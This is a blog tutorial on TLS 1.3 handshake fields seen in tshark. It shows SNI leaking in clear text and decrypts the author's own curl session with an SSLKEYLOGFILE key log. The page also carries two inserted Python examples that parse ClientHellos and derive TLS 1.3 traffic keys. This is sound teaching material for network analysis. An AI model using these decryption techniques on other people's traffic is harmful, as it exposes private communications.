<span style="color: white;"> Supported Version: TLS 1.3 (0x0304)</span>
<span style="color: white;"> Extension: psk_key_exchange_modes (len=2)</span>
<span style="color: white;"> Type: psk_key_exchange_modes (45)</span>
<span style="color: white;"> Length: 2</span>
<span style="color: white;"> PSK Key Exchange Modes Length: 1</span>
<span style="color: white;"> PSK Key Exchange Mode: PSK with (EC)DHE key establishment (psk_dhe_ke) (1)</span>
<span style="color: white;"> 11: Extension: key_share (len=38)</span>
<span style="color: white;"> Type: key_share (51)</span>
<span style="color: white;"> Length: 38</span>
<span style="color: white;"> Key Share extension</span>
<span style="color: white;"> Client Key Share Length: 36</span>
<span style="color: white;"> Key Share Entry: Group: x25519, Key Exchange length: 32</span>
<span style="color: white;"> Group: x25519 (29)</span>
<span style="color: white;"> Key Exchange Length: 32</span>
<span style="color: white;"> Key Exchange: 7d0b7c312e2e88130463417583423ca34085069e2950c9d08bc737e96e12b757</span>
</pre></div>
</div><div><br /></div><div><div>1: Similar to TLS 1.0, we see the record layer reports a version of TLS 1.0 (0x0301). </div><div><br /></div><div>2: In the Handshake Protocol, we see version 1.2 (0x0303) for TLS 1.2. In reality, this version field is considered legacy in TLS 1.3. TLS 1.3 instead leverages the "<i>supported_versions</i>" extension for the client to indicate the versions it supports. We see the "<i>supported_versions</i>" extension at number 10 above. At a minimum, the ClientHello message will contain a "<i>supported_versions</i>" extension. Only if this extension exists will the server attempt to negotiate TLS 1.3.</div><div><br /></div><div>3: Random Bytes: One of the things this is used for is protection against replay of TLS 1.3 1-RTT data.</div><div><br /></div><div>4: Session ID: The session_id field is also considered legacy in TLSv1.3. As we saw with TLSv1.0, the ability to resume a session existed. The value we see above would be from a pre-TLSv1.3 session. TLSv1.3 does not support session resumption via this session_id field.</div><div><br /></div><div>5: Cipher Suites (4 suites): This is the list of symmetric cipher suites supported by the client, each pairing an encryption algorithm with the hash algorithm to be used. As with TLSv1.0, these are in the order of client preference.</div><div><br /></div><div>6: Compression methods are also considered legacy in TLS 1.3.</div><div><br /></div><div>7: Extensions: TLS 1.3 makes extensive use of extensions. TLS 1.3 makes some extensions mandatory, since functionality has moved into these extensions so as to preserve compatibility with previous versions of TLS. If a server does not recognize an extension, the server should just ignore it.</div><div><br /></div><div>8: supported_groups: The client uses this extension to indicate the named groups it supports for key exchange. As with the cipher suites and the signature algorithms, it is ordered from most preferred to least preferred. In this list, we have x25519 as the first item.</div><div><br /></div><div>9: signature_algorithms: This identifies the signature algorithms that may be used in digital signatures. In this example, signature_algorithms also applies to the signatures appearing in certificates, as there is no "signature_algorithms_cert" extension. If the client requires the server to authenticate itself via a certificate, then the client must send this signature_algorithms extension. If the server is authenticating via a certificate but the client has not sent this extension, then the server MUST abort the handshake with a "missing_extension" alert. </div><div><br /></div><div>10: supported_versions: As mentioned in 2, this is used by the client to indicate which versions of TLS it supports, and by the server to specify the version it is using.</div><div><br /></div><div>11: key_share: This carries the endpoint's cryptographic parameters for the key exchange. The key exchange information is determined by the group and its corresponding definition. We see here that the client has generated its "<i>key_share</i>" based on the group x25519, which was the first group identified in 8 above. This <i>key_share</i> represents the client guessing which group the server is going to choose from the list the client provides. In this case we see one <i>key_share.</i></div><div><br /></div><div>The <i>Client Hello </i>and <i>Server Hello</i> messages are used together to determine the shared keys.</div><div><br /></div><div>With that understanding of the Client Hello, let's take a quick glance at the Server Hello message.</div></div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "tls.handshake.type == 2" -V | sed '1,82d' </span>
<span style="color: white;">Transport Layer Security</span>
<span style="color: white;"> TLSv1.2 Record Layer: Handshake Protocol: Server Hello</span>
<span style="color: white;"> Content Type: Handshake (22)</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Length: 122</span>
<span style="color: white;"> Handshake Protocol: Server Hello</span>
<span style="color: white;"> 1: Handshake Type: Server Hello (2)</span>
<span style="color: white;"> Length: 118</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Random: da42c2479a3a83e8d13b13b9fbf446953a5b301c93c16c0e47fb661212ac13f0</span>
<span style="color: white;"> Session ID Length: 32</span>
<span style="color: white;"> Session ID: edb77086c25eb6bd211601cbbda8a316018082c8c67f02e9738e40226e2c4f30</span>
<span style="color: white;"> 2: Cipher Suite: TLS_AES_256_GCM_SHA384 (0x1302)</span>
<span style="color: white;"> Compression Method: null (0)</span>
<span style="color: white;"> Extensions Length: 46</span>
<span style="color: white;"> 3: Extension: key_share (len=36)</span>
<span style="color: white;"> Type: key_share (51)</span>
<span style="color: white;"> Length: 36</span>
<span style="color: white;"> Key Share extension</span>
<span style="color: white;"> Key Share Entry: Group: x25519, Key Exchange length: 32</span>
<span style="color: white;"> Group: x25519 (29)</span>
<span style="color: white;"> Key Exchange Length: 32</span>
<span style="color: white;"> Key Exchange: b890eba94dad2c2bd955684a395592e1d26ed73308d4d9eed988912afafc5a13</span>
<span style="color: white;"> 4: Extension: supported_versions (len=2)</span>
<span style="color: white;"> Type: supported_versions (43)</span>
<span style="color: white;"> Length: 2</span>
<span style="color: white;"> Supported Version: TLS 1.3 (0x0304)</span>
<span style="color: white;"> [JA3S Fullstring: 771,4866,51-43]</span>
<span style="color: white;"> [JA3S: 907bf3ecef1c987c889946b737b43de8]</span>
<span style="color: white;"> 5: TLSv1.3 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec</span>
<span style="color: white;"> Content Type: Change Cipher Spec (20)</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Length: 1</span>
<span style="color: white;"> Change Cipher Spec Message</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>We already learned from the Client Hello that fields such as version, session_id, compression_method, etc., are legacy. No need to touch on them again. Keeping it simple.</p><p>1: Handshake Type: Server Hello, in response to the Client Hello.</p><p>2. Cipher Suite: The value selected is the cipher suite chosen from the list in the Client Hello. As we see here, the server chose the first value. Since the client already sent its <i>key_share</i> and the server has now chosen the algorithm, the server can generate its own <i>key_share</i>, which it sends to the client. At the same time, the server can combine the client's <i>key_share</i> with its own to derive the symmetric keys needed for encryption. </p><p>3. <i>key_share</i>: The server calculates its <i>key_share</i> value using the first group in the client's list of <i>supported_groups</i>.</p><p>4. <i>supported_versions</i>: identifies this as TLS 1.3.</p><p>5. The communication transitions to encrypted. Not much for us to do beyond here. This is, however, where the Server Certificate, etc., is sent for the client to authenticate the server. </p><p>Looking at frame 8, we see encrypted application data, with the protocol identified as HTTP.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "frame.number == 8" -V | sed '1,89d' </span>
<span style="color: white;"> TLSv1.3 Record Layer: Application Data Protocol: Hypertext Transfer Protocol</span>
<span style="color: white;"> Opaque Type: Application Data (23)</span>
<span style="color: white;"> Version: TLS 1.2 (0x0303)</span>
<span style="color: white;"> Length: 4567</span>
<span style="color: white;"> Encrypted Application Data: 9b533b25659e1404e41388747c1a403679bf9b986c3127f65f13a5a0a01fd03aa21b40c7…</span>
<span style="color: white;"> [Application Data Protocol: Hypertext Transfer Protocol]</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><div><div>With all of this understanding now out of the way, let's look at decrypting this communication. </div><div><br /></div><div>Before we decrypt anything, if I said to you, "we can see traffic occurring over port 443 without decrypting", you may say that is not possible because we know port 443 traffic is normally encrypted. This is correct. However, what we should have noticed in our earlier learning is that when this connection is starting up, it is in clear text. There is also an extension called "<i>Server Name Indication extension</i>", which we can pull straight out of the Client Hello.</div></div><div><br /></div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ tshark -n -r securitynik_tls1.3.pcap -Y "tls.handshake.type == 1" -V | sed '1,105d;114,$d' </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Extension: server_name</span></b><span style="color: white;"> (len=24)</span></span>
<span style="color: white;"> Type: server_name (0)</span>
<span style="color: white;"> Length: 24</span>
<span style="color: white;"> Server Name Indication extension</span>
<span style="color: white;"> Server Name list length: 22</span>
<span style="color: white;"> Server Name Type: host_name (0)</span>
<span style="color: white;"> Server Name length: 19</span>
<span><span style="color: white;"> Server Name: </span><b><span style="color: #fcff01;">www.securitynik.com</span></b></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
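<p>To tie the Client Hello walk-through and the server_name extension together, here is an added parser (my own example code, not the blog's, pktIntel's or Wireshark's) that walks the record layer, the handshake header and the extensions called out above. The ClientHello it parses is constructed inline to mirror the capture's values (TLS_AES_256_GCM_SHA384 first, x25519 first, supported_versions = TLS 1.3, SNI www.securitynik.com); the random, session_id and key share bytes are made up.</p>

```python
import struct

EXT_SERVER_NAME = 0          # extension type numbers, as shown in the tshark output
EXT_SUPPORTED_GROUPS = 10
EXT_SUPPORTED_VERSIONS = 43
EXT_KEY_SHARE = 51
TLS13 = 0x0304


def _u16(buf, pos):
    """Read a big-endian 16-bit field at pos."""
    return struct.unpack("!H", buf[pos:pos + 2])[0]


def parse_client_hello(record):
    """Parse one TLS record carrying a ClientHello into a dict of the fields discussed above."""
    content_type, record_version, record_len = struct.unpack("!BHH", record[:5])
    if content_type != 22:
        raise ValueError("not a handshake record")
    body = record[5:5 + record_len]
    if len(body) != record_len or body[0] != 1:
        raise ValueError("truncated record or not a ClientHello")
    hs_len = int.from_bytes(body[1:4], "big")
    hs = body[4:4 + hs_len]
    if len(hs) != hs_len:
        raise ValueError("truncated ClientHello")
    info = {"record_version": record_version, "legacy_version": _u16(hs, 0)}
    info["random"] = hs[2:34]                       # 32 bytes; the key log is indexed by it
    pos = 34
    sid_len = hs[pos]
    pos += 1
    info["session_id"] = hs[pos:pos + sid_len]      # legacy in TLS 1.3
    pos += sid_len
    cs_len = _u16(hs, pos)
    pos += 2
    info["cipher_suites"] = [_u16(hs, i) for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    comp_len = hs[pos]
    pos += 1
    info["compression"] = list(hs[pos:pos + comp_len])   # legacy in TLS 1.3, always [0]
    pos += comp_len
    info.update(server_name=None, supported_groups=[], supported_versions=[], key_shares=[])
    if pos < len(hs):                               # extensions block is present
        ext_len = _u16(hs, pos)
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", hs[pos:pos + 4])
            pos += 4
            _parse_extension(etype, hs[pos:pos + elen], info)
            pos += elen
    # TLS 1.3 is only negotiated when supported_versions carries 0x0304
    info["offers_tls13"] = TLS13 in info["supported_versions"]
    return info


def _parse_extension(etype, data, info):
    """Decode the extensions the write-up cares about; unknown ones are ignored, as a server would."""
    if etype == EXT_SERVER_NAME:
        p = 2                                       # skip the ServerNameList length
        while p + 3 <= len(data):
            name_type, name_len = data[p], _u16(data, p + 1)
            if name_type == 0:                      # host_name, sent in clear text
                info["server_name"] = data[p + 3:p + 3 + name_len].decode("ascii")
            p += 3 + name_len
    elif etype == EXT_SUPPORTED_GROUPS:
        n = _u16(data, 0)
        info["supported_groups"] = [_u16(data, i) for i in range(2, 2 + n, 2)]
    elif etype == EXT_SUPPORTED_VERSIONS:
        n = data[0]                                 # one-byte length in the ClientHello form
        info["supported_versions"] = [_u16(data, i) for i in range(1, 1 + n, 2)]
    elif etype == EXT_KEY_SHARE:
        n = _u16(data, 0)
        p = 2
        while p + 4 <= 2 + n:
            group, klen = _u16(data, p), _u16(data, p + 2)
            info["key_shares"].append({"group": group, "key_exchange": data[p + 4:p + 4 + klen]})
            p += 4 + klen


def build_sample_client_hello():
    """Constructed ClientHello mirroring the field values in the tshark output (not a real capture)."""
    random = bytes(range(32))                       # constructed, not a real random
    session_id = b"\xaa" * 32                       # constructed legacy session_id
    suites = b"".join(struct.pack("!H", s) for s in (0x1302, 0x1303, 0x1301, 0x00FF))
    name = b"www.securitynik.com"
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name        # host_name(0) + length + name
    sni = struct.pack("!H", len(sni_entry)) + sni_entry               # len=24, list length 22, name 19
    grp = b"".join(struct.pack("!H", g) for g in (0x001D, 0x0017, 0x001E))
    groups = struct.pack("!H", len(grp)) + grp
    versions = b"\x02" + struct.pack("!H", TLS13)                     # len=3, one version
    share = struct.pack("!HH", 0x001D, 32) + b"\x7d" * 32             # constructed x25519 share
    key_share = struct.pack("!H", len(share)) + share                 # len=38, client share length 36
    exts = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in (
        (EXT_SERVER_NAME, sni), (EXT_SUPPORTED_GROUPS, groups),
        (EXT_SUPPORTED_VERSIONS, versions), (EXT_KEY_SHARE, key_share)))
    body = (struct.pack("!H", 0x0303) + random + bytes([len(session_id)]) + session_id
            + struct.pack("!H", len(suites)) + suites + b"\x01\x00"
            + struct.pack("!H", len(exts)) + exts)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return struct.pack("!BHH", 22, 0x0301, len(handshake)) + handshake   # record version 0x0301, as seen


if __name__ == "__main__":
    ch = parse_client_hello(build_sample_client_hello())
    print("SNI:", ch["server_name"], "| offers TLS 1.3:", ch["offers_tls13"])
    print("first suite: 0x%04x | first group: 0x%04x" % (ch["cipher_suites"][0], ch["supported_groups"][0]))
```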
<p></p><p>So as seen above, even without decrypting, we are able to see the domain the client is going to. This is exactly the feature that my tool pktIntel.py (<a href="https://github.com/SecurityNik/pktIntel">https://github.com/SecurityNik/pktIntel</a>) uses. </p><p>Let's decrypt from a few perspectives. </p><p><span style="font-size: large;"><br />First let's decrypt using the </span><i style="font-size: large;">SSLKEYLOGFILE.</i></p><p>To decrypt traffic from the browser, or from a command line tool such as <i>curl</i> that supports logging its TLS secrets, we need to set the SSLKEYLOGFILE environment variable. Let's do this!</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ export SSLKEYLOGFILE=/home/kali/sslkeylog.file</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ echo $SSLKEYLOGFILE </span>
<span style="color: white;">/home/kali/sslkeylog.file</span>
<span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ls sslkeylogfile*.*</span>
<span style="color: white;">ls: cannot access 'sslkeylogfile*.*': No such file or directory</span>
</pre></div>
</div><div><br /></div><p>First, I created the environment variable via the <i>export</i> command.</p><p>Next, I validated that the <i>SSLKEYLOGFILE </i>environment variable was created by using the <i>echo </i>command.</p><p>When the variable was created, it pointed to a file. When I ran <i>ls</i>, we see the file does not currently exist. If this was set up correctly, the file will be created automatically once the (pre-)master secrets are written to it.</p><p><br />Set up TShark to capture the traffic.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark --interface eth0 -w /tmp/curl.pcapng -f 'port 443 and host www.securitynik.com'</span>
<span style="color: white;">Running as user "root" and group "root". This could be dangerous.</span>
<span style="color: white;">Capturing on 'eth0'</span>
<span style="color: white;"> ** (tshark:151432) 13:57:39.885233 [Main MESSAGE] -- Capture started.</span>
<span style="color: white;"> ** (tshark:151432) 13:57:39.885309 [Main MESSAGE] -- File: "/tmp/curl.pcapng"</span>
</pre></div>
<br /><br /><div>Launching <i>curl</i> ...<div><p></p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ curl --silent https://www.securitynik.com --tlsv1.3 --tls-max 1.3 --output /tmp/index.txt</span>
</pre></div>
</div><div><br /></div><div><div>Revisiting <i>SSLKEYLOGFILE</i>, we see the file now exists:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ ls sslkeylog.file -l</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 938 Jul 24 14:00 sslkeylog.file</span>
</pre></div>
</div><div><br /></div><div><div>Looking inside the file, we see the secrets for our single curl session (all five lines carry the same client random in the second column):</div></div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ head sslkeylog.file </span>
<span style="color: white;">SERVER_HANDSHAKE_TRAFFIC_SECRET edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 81965dd5815a94c08b183d6967e92a9d425d579acc64e29fd381dbd9ba370db5070fc906d3ac46f4dd0c093620d06dac</span>
<span style="color: white;">EXPORTER_SECRET edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 7b36723ef808a75158ffc36e40c0928af50022585b7b436a5a017b79927d961daf06a237d8e683435d86539586136f42</span>
<span style="color: white;">SERVER_TRAFFIC_SECRET_0 edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 17403da98e23b307d25b0d5f7e3987f53f9636b29b51042fdec9abe29ea2c717afb723a3c69b365b0682f636d6c13503</span>
<span style="color: white;">CLIENT_HANDSHAKE_TRAFFIC_SECRET edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 c648aa60612a3437d113105bc22979ba6de182d0ab0b85e48403a59570e5a690c1fb502976993d5c145b888651f56cbc</span>
<span style="color: white;">CLIENT_TRAFFIC_SECRET_0 edbe2472eead5da6a5c23a3eaca03e1b7d16a42bb9d29ea451bc8588c4bf7d15 56122f06fef5db1ba481b9bd282cd7ec00a8e5246f901d1ae5c650c9bbe1b15cfbb6777ca04392efa0a3ab890d01fbd9</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
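<p>Here is an added example (my own code, not the blog's or Wireshark's) that reads a key log in the format shown above, groups the secrets by client random, checks them against the negotiated cipher suite and derives the AEAD key and IV the way TLS 1.3 does (RFC 8446, sections 7.1 and 7.3), which is the step tshark performs internally when handed the file. The key log it reads is constructed inline with made-up secrets: one session that negotiated TLS_AES_256_GCM_SHA384 (0x1302) like the capture, and one SHA-256 session whose EXPORTER_SECRET line is missing.</p>

```python
import hashlib
import hmac
from collections import defaultdict

# Labels a TLS 1.3 session writes to the key log (a TLS 1.2 session writes CLIENT_RANDOM instead)
TLS13_LABELS = {
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0", "EXPORTER_SECRET",
}
# Hash and AEAD key length of the TLS 1.3 suites offered in the Client Hello above
SUITES = {0x1301: ("sha256", 16), 0x1302: ("sha384", 32), 0x1303: ("sha256", 32)}

# Constructed key log with the same layout as sslkeylog.file; none of these are real secrets.
RAND_A, RAND_B = "aa" * 32, "bb" * 32
SAMPLE_KEYLOG = "\n".join(
    ["# constructed sample, not real secrets", ""]
    + [f"{label} {RAND_A} {('%02x' % i) * 48}"          # 48-byte secrets: SHA-384 suite
       for i, label in enumerate(sorted(TLS13_LABELS), 1)]
    + [f"{label} {RAND_B} {('%02x' % i) * 32}"          # 32-byte secrets: SHA-256 suite
       for i, label in enumerate(sorted(TLS13_LABELS - {"EXPORTER_SECRET"}), 1)]
)


def parse_keylog(text):
    """Return {client_random_hex: {label: secret_bytes}}, skipping comments and blank lines."""
    sessions = defaultdict(dict)
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected 'LABEL client_random secret'")
        label, client_random, secret = parts
        if len(client_random) != 64:
            raise ValueError(f"line {lineno}: client random must be 32 bytes of hex")
        sessions[client_random.lower()][label] = bytes.fromhex(secret)
    return dict(sessions)


def check_session(secrets, cipher_suite):
    """Report missing TLS 1.3 labels and secrets whose size does not match the suite's hash."""
    digest, _ = SUITES[cipher_suite]
    expected = hashlib.new(digest).digest_size      # 32 for SHA-256, 48 for SHA-384
    return {
        "hash": digest,
        "missing": sorted(TLS13_LABELS - secrets.keys()),
        "wrong_length": sorted(label for label, s in secrets.items()
                               if label in TLS13_LABELS and len(s) != expected),
    }


def hkdf_label(label, context, length):
    """The HkdfLabel structure from RFC 8446 section 7.1: length, "tls13 " + label, context."""
    full = b"tls13 " + label
    return length.to_bytes(2, "big") + bytes([len(full)]) + full + bytes([len(context)]) + context


def hkdf_expand(prk, info, length, digest):
    """HKDF-Expand (RFC 5869) built on HMAC with the suite's hash."""
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), digest).digest()
        out += block
        counter += 1
    return out[:length]


def traffic_keys(traffic_secret, cipher_suite):
    """Derive one direction's AEAD write key and IV from its traffic secret (RFC 8446 section 7.3)."""
    digest, key_len = SUITES[cipher_suite]
    key = hkdf_expand(traffic_secret, hkdf_label(b"key", b"", key_len), key_len, digest)
    iv = hkdf_expand(traffic_secret, hkdf_label(b"iv", b"", 12), 12, digest)
    return key, iv


if __name__ == "__main__":
    sessions = parse_keylog(SAMPLE_KEYLOG)
    print(RAND_A[:8], check_session(sessions[RAND_A], 0x1302))
    print(RAND_B[:8], check_session(sessions[RAND_B], 0x1301))
    key, iv = traffic_keys(sessions[RAND_A]["CLIENT_TRAFFIC_SECRET_0"], 0x1302)
    print("client application write key:", key.hex(), "iv:", iv.hex())
```

The client random in the second column is what ties each line to a Client Hello in the capture, which is how tshark picks the right secrets for each session.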
</div><p>What are those values? See the reference section. Basically, those are the secrets used to encrypt the application data, the handshake, etc.</p><p>Note, because we set the <i>SSLKEYLOGFILE </i>environment variable, if we open our browser and it has been compiled with this option, then the connections the browser makes will similarly result in secrets being written to this file. Hence, I am not going to repeat this with a browser. You can test it for yourself.</p><p>How do we decrypt this? Let's first look at the protocol hierarchy of the undecrypted traffic with TShark.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -q -z io,phs 2>/dev/null </span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:622 bytes:1095342</span>
<span style="color: white;"> ip frames:622 bytes:1095342</span>
<span style="color: white;"> tcp frames:622 bytes:1095342</span>
<span style="color: white;"> tls frames:313 bytes:1078582</span>
<span style="color: white;"> tcp.segments frames:121 bytes:504319</span>
<span style="color: white;"> tls frames:101 bytes:496976</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div>Clearly, beyond "<i>tls</i>" we are unable to conclude what type of traffic is carried inside TLS. Let's fix that by leveraging the <i>sslkeylog.file</i> we created via the SSLKEYLOGFILE environment variable. We need to override the <i>TShark </i>configuration by telling it to use <i>sslkeylog.file</i> as the input for decryption.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -q -z io,phs </span><b><span style="color: #fcff01;">-o "tls.keylog_file: /home/kali/sslkeylog.file"</span></b><span style="color: white;"> 2>/dev/null </span></span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:622 bytes:1095342</span>
<span style="color: white;"> ip frames:622 bytes:1095342</span>
<span style="color: white;"> tcp frames:622 bytes:1095342</span>
<span style="color: white;"> tls frames:313 bytes:1078582</span>
<span style="color: white;"> http2 frames:52 bytes:227960</span>
<span style="color: white;"> http2 frames:2 bytes:256</span>
<span style="color: white;"> http2 frames:1 bytes:140</span>
<span style="color: white;"> tls.segments frames:45 bytes:227055</span>
<span style="color: white;"> tcp.segments frames:9 bytes:55662</span>
<span style="color: white;"> tls frames:8 bytes:51372</span>
<span style="color: white;"> http2 frames:2 bytes:17052</span>
<span style="color: white;"> tls.segments frames:2 bytes:17052</span>
<span style="color: white;"> http2 frames:1 bytes:6333</span>
<span style="color: white;"> tls.segments frames:1 bytes:6333</span>
<span style="color: white;"> tcp.segments frames:112 bytes:448657</span>
<span style="color: white;"> tls frames:93 bytes:445604</span>
<span style="color: white;"> http2 frames:28 bytes:239306</span>
<span style="color: white;"> tls.segments frames:27 bytes:234102</span>
<span style="color: white;"> http2 frames:4 bytes:51048</span>
<span style="color: white;"> tls.segments frames:4 bytes:51048</span>
<span style="color: white;"> data-text-lines frames:1 bytes:5204</span>
<span style="color: white;"> tls.segments frames:1 bytes:5204</span>
<span style="color: white;"> http2 frames:1 bytes:5204</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Wow! Now we can see all the application layer data as HTTP2. What can I do with this? Well, if I wanted to do signature based analysis, I could. Let's say we know the threat actor's attack tool contains the string/signature "<i>securitynik</i>". Do note, you can feed the same file to Wireshark and it can also decrypt the traffic.</div><div><br /></div><div>Let's first reassemble the session by following the TLS stream.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo tshark -n -r /tmp/curl.pcapng -o "tls.keylog_file: /home/kali/sslkeylog.file" -q -z follow,tls,ascii,0 | head --lines=30</span>
<span style="color: white;">Running as user "root" and group "root". This could be dangerous.</span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Follow: tls,ascii</span>
<span style="color: white;">Filter: tcp.stream eq 0</span>
<span style="color: white;">Node 0: 142.251.41.51:443</span>
<span style="color: white;">Node 1: :0</span>
<span style="color: white;"> 64</span>
<span style="color: white;">PRI * HTTP/2.0</span>
<span style="color: white;">SM</span>
<span style="color: white;">..............d.........................</span>
<span style="color: white;"> 43</span>
<span style="color: white;">..".........A.....)-...Q..C.z.%.P.....S.*/*</span>
<span style="color: white;">40</span>
<span style="color: white;">..............d.........................</span>
<span style="color: white;"> 9</span>
<span style="color: white;">.........</span>
<span style="color: white;">9</span>
<span style="color: white;">.........</span>
<span style="color: white;">191</span>
<span style="color: white;">.........._.I|...M.j.q........d..z...Je....2.^..\e.1h.....z...Je....2.^..\e.1h.X...w.K..#...,.l..m_J..2.B...P..e...LZ7.@....RKRVO....I.R?......@....!j.:JD........B...'_v.GSER....{...-i[.D<..o</span>
<span style="color: white;">1408</span>
<span style="color: white;">.1~......<!DOCTYPE html></span>
<span style="color: white;"><html class='v2' dir='ltr' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'></span>
<span style="color: white;"><head></span>
<span style="color: white;"><link href='https://www.blogger.com/static/v1/widgets/3566091532-css_bundle_v2.css' rel='stylesheet' type='text/css'/></span>
<span style="color: white;"><!-- ADDED BY NIK --></span>
<span style="color: white;"><script async='async' src='//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script></span>
